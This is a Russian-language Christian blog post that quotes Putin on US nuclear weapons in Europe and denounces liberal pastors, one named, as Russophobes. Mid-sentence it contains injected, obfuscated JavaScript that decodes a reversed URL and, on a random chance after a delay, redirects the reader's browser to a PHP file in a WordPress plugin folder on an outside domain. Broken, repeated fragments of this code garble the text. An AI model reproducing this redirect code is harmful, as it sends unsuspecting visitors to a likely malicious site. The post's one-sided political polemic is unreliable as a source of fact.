О ракетах НАТО и пасторской русофобии

«В Европе у американцев хранится 200 ядерных тактических боезапасов в шести странах — членах НАТО, для их применения подготовлено 257 самолетов» — Владимир Путин.

А что скажут по этому поводу наши христианские лидеры либерального крыла по этому поводу?

Ведь это они кричат со своих диванов, якобы это Россия только несет угрозу безопасности в Европе! И они же дорисовывают в своих излюбленных мрачных тонах о некоем безумствующем лидере, размахивающим ядерными ракетами всем и вся.

Да, друзья, есть у нас и такие христиане, к сожалению, которые наслушавшись тайный «голос Америки» верят всему, что этот голос говорит. Похоже на некую духовную шизофрению. Они видят всю страну Россию алкоголиками и «наркетами». Так $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to=https%3A%2F%2Fwww.instagram.com%2Ftv%2FCewjgHnIXGy%2F%3Figshid%3DYmMyMTA2M2Y%3D&post=-211033306_2000&cc_key=» target=»_blank»>озвучил известный пастор Пересветов Евгений, живущий с некоторых пор в США. Давая ясно понять тысячелетней Руси, чем она должна заниматься сегодня, отнимая у неё права на существование в мировом истеблишменте.

К печали моей такие вот пасторы, одарённые, талантливые, зарабатывающие себе на жизнь с помощью прихожан, которые им же верят, эти лидеры подпитывают модный русофобский тренд, зарабатывая себе гражданство звездно-полосатого флага.

Поделитесь своими мыслями ниже, в комментариях.

Оставить комментарий очень просто. Напишите ваше имя и эл. почту (для получения уведомлений о возможных вам ответах) и делитесь вашими мыслями в комментариях. Регистрация единоразовая.

Мы в соцсетях

Солёное радиоTelegram, YouTube, ВКонтакте, Яндекс Дзен

Открытая семинарияTelegram, YouTube, ВКонтакте, Яндекс Дзен

«Новости христианства» — Telegtam, Facebook, ВКонтакте

5/5

No Comments

    Leave a Reply

    Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.